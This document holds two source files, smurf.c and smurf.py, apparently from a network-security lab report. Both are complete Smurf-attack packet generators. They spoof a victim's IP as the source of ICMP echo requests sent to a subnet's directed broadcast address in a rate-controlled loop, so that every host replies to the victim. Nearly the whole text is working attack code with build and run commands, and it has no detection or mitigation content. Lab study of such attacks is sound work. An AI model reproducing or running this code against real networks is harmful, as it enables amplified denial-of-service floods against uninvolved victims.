File: lab/src/smurf.c
/* smurf.c — hand-rolled Smurf-attack packet generator (report deliverable).
 *
 * Same design as smurf.py: a raw SOCK_RAW/IPPROTO_RAW socket with IP_HDRINCL,
 * an IP + ICMP-echo packet whose source is the spoofed VICTIM and whose
 * destination is a subnet DIRECTED BROADCAST, sent in a rate-controlled loop.
 * Every header field and BOTH checksums are computed here by hand.
 *
 * Build:  gcc -O2 -Wall -o smurf smurf.c
 * Run  :  ip netns exec attacker ./smurf <victim_ip> <broadcast_ip> \
 *                                        [rate_pps] [count] [payload_bytes]
 * e.g.:   ip netns exec attacker ./smurf 10.0.20.100 10.0.10.255 50 100 0
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <time.h>
#include <arpa/inet.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>

/* 16-bit one's-complement Internet checksum (RFC 1071). */
static unsigned short checksum(const void *buf, int len)
{
    const unsigned char *p = buf;
    unsigned long sum = 0;
    while (len > 1) {
        sum += (unsigned long)((p[0] << 8) | p[1]);  /* big-endian 16-bit word */
        p += 2;
        len -= 2;
    }
    if (len == 1)
        sum += (unsigned long)(p[0] << 8);           /* pad final odd byte */
    sum = (sum >> 16) + (sum & 0xffff);
    sum += (sum >> 16);
    return (unsigned short)(~sum);
}

int main(int argc, char **argv)
{
    if (argc < 3) {
        fprintf(stderr,
            "usage: %s <victim_ip> <broadcast_ip> [rate_pps] [count] [payload_bytes]\n",
            argv[0]);
        return 1;
    }
    const char *victim = argv[1];
    const char *bcast  = argv[2];
    int  rate    = (argc > 3) ? atoi(argv[3]) : 50;
    long count   = (argc > 4) ? atol(argv[4]) : 100;
    int  payload = (argc > 5) ? atoi(argv[5]) : 0;
    if (rate <= 0)    rate = 50;
    if (payload < 0)  payload = 0;

    int s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
    if (s < 0) { perror("socket (need root)"); return 1; }
    int one = 1;
    setsockopt(s, IPPROTO_IP, IP_HDRINCL, &one, sizeof(one));
    setsockopt(s, SOL_SOCKET, SO_BROADCAST, &one, sizeof(one));

    int  icmp_len = (int)sizeof(struct icmphdr) + payload;
    int  tot      = (int)sizeof(struct iphdr) + icmp_len;
    unsigned char *pkt = calloc(1, tot);
    if (!pkt) { perror("calloc"); return 1; }

    struct iphdr   *ip = (struct iphdr *)pkt;
    struct icmphdr *ic = (struct icmphdr *)(pkt + sizeof(struct iphdr));
    unsigned char  *data = pkt + sizeof(struct iphdr) + sizeof(struct icmphdr);
    for (int i = 0; i < payload; i++)
        data[i] = (unsigned char)(0x41 + (i % 26));

    ip->version  = 4;
    ip->ihl      = 5;
    ip->tos      = 0;
    ip->tot_len  = htons(tot);
    ip->id       = htons(0x1234);
    ip->frag_off = 0;
    ip->ttl      = 64;
    ip->protocol = IPPROTO_ICMP;
    ip->check    = 0;
    if (inet_pton(AF_INET, victim, &ip->saddr) != 1) { fprintf(stderr, "bad victim ip\n"); return 1; }
    if (inet_pton(AF_INET, bcast,  &ip->daddr) != 1) { fprintf(stderr, "bad broadcast ip\n"); return 1; }
    ip->check = htons(checksum(ip, sizeof(struct iphdr)));

    struct sockaddr_in dst;
    memset(&dst, 0, sizeof(dst));
    dst.sin_family = AF_INET;
    dst.sin_addr.s_addr = ip->daddr;

    struct timespec ts = { .tv_sec = 0, .tv_nsec = 1000000000L / rate };
    long sent = 0;
    printf("smurf.c: src=%s (spoofed) -> dst=%s  count=%ld rate=%dpps payload=%dB\n",
           victim, bcast, count, rate, payload);
    for (long n = 0; n < count; n++) {
        ic->type          = ICMP_ECHO;   /* type 8 */
        ic->code          = 0;
        ic->checksum      = 0;
        ic->un.echo.id    = htons((unsigned short)(getpid() & 0xffff));
        ic->un.echo.sequence = htons((unsigned short)n);
        ic->checksum      = htons(checksum(ic, icmp_len));
        if (sendto(s, pkt, tot, 0, (struct sockaddr *)&dst, sizeof(dst)) < 0)
            perror("sendto");
        else
            sent++;
        nanosleep(&ts, NULL);
    }
    printf("smurf.c: sent %ld spoofed echo requests\n", sent);

    free(pkt);
    close(s);
    return 0;
}

File: lab/src/smurf.py
#!/usr/bin/env python3
"""smurf.py — hand-rolled Smurf-attack packet generator (lab bring-up tool).

Every header byte and BOTH checksums are computed here; no hping/nping/scapy.
It opens a raw IPPROTO_RAW socket with IP_HDRINCL, builds an IP + ICMP-echo
packet whose source is the VICTIM (spoofed) and whose destination is a subnet
DIRECTED BROADCAST, and sends it in a rate-controlled loop. On a misconfigured
network every live host on the broadcast subnet answers the victim, so N hosts
turn 1 request into N replies (amplification factor N).

Run inside the attacker namespace as root, e.g.:
    ip netns exec attacker python3 smurf.py --victim 10.0.20.100 \
        --broadcast 10.0.10.255 --count 100 --rate 50

Fields set (report Table 1): IP src=victim, dst=broadcast, proto=1(ICMP),
recomputed IP checksum; ICMP type=8 code=0, id/seq, recomputed ICMP checksum.
"""
import argparse
import os
import socket
import struct
import sys
import time


def checksum(data: bytes) -> int:
    """16-bit one's-complement Internet checksum (RFC 1071)."""
    if len(data) % 2:
        data += b"\x00"
    total = 0
    for i in range(0, len(data), 2):
        total += (data[i] << 8) | data[i + 1]   # sum 16-bit big-endian words
    total = (total >> 16) + (total & 0xFFFF)     # fold carries
    total += total >> 16
    return (~total) & 0xFFFF                      # store big-endian ('!H')


def build_ip_header(src: str, dst: str, payload_len: int, ip_id: int) -> bytes:
    total_len = 20 + payload_len
    ihl_ver = (4 << 4) | 5           # IPv4, 5 * 4 = 20-byte header
    fields = (
        ihl_ver, 0, total_len, ip_id, 0, 64, socket.IPPROTO_ICMP, 0,
        socket.inet_aton(src), socket.inet_aton(dst),
    )
    header = struct.pack("!BBHHHBBH4s4s", *fields)          # checksum = 0
    chk = checksum(header)
    fields = fields[:7] + (chk,) + fields[8:]
    return struct.pack("!BBHHHBBH4s4s", *fields)            # checksum filled


def build_icmp_echo(icmp_id: int, seq: int, payload: bytes) -> bytes:
    head = struct.pack("!BBHHH", 8, 0, 0, icmp_id, seq)     # type=8,code=0,ck=0
    chk = checksum(head + payload)
    head = struct.pack("!BBHHH", 8, 0, chk, icmp_id, seq)
    return head + payload


def main() -> int:
    ap = argparse.ArgumentParser(description="Hand-crafted Smurf sender.")
    ap.add_argument("--victim", required=True, help="spoofed source (flood target)")
    ap.add_argument("--broadcast", required=True, help="subnet directed-broadcast dst")
    ap.add_argument("--count", type=int, default=100, help="requests to send (default 100)")
    ap.add_argument("--rate", type=float, default=50.0, help="packets/sec (default 50)")
    ap.add_argument("--size", type=int, default=0, help="ICMP payload bytes (default 0)")
    args = ap.parse_args()

    if args.rate <= 0:
        ap.error("--rate must be > 0")
    if args.size < 0:
        ap.error("--size must be >= 0")

    payload = bytes((0x41 + (i % 26)) for i in range(args.size))
    icmp_id = os.getpid() & 0xFFFF
    interval = 1.0 / args.rate

    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)
    except PermissionError:
        print("error: raw socket needs root (run under sudo / ip netns exec).", file=sys.stderr)
        return 1
    s.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)
    s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)

    ip_header = build_ip_header(args.victim, args.broadcast, 8 + args.size, 0x1234)
    sent = 0
    print(f"smurf.py: src={args.victim} (spoofed) -> dst={args.broadcast}  "
          f"count={args.count} rate={args.rate}pps payload={args.size}B")
    try:
        for seq in range(args.count):
            pkt = ip_header + build_icmp_echo(icmp_id, seq & 0xFFFF, payload)
            s.sendto(pkt, (args.broadcast, 0))
            sent += 1
            time.sleep(interval)
    except KeyboardInterrupt:
        pass
    finally:
        s.close()
    print(f"smurf.py: sent {sent} spoofed echo requests")
    return 0


if __name__ == "__main__":
    sys.exit(main())
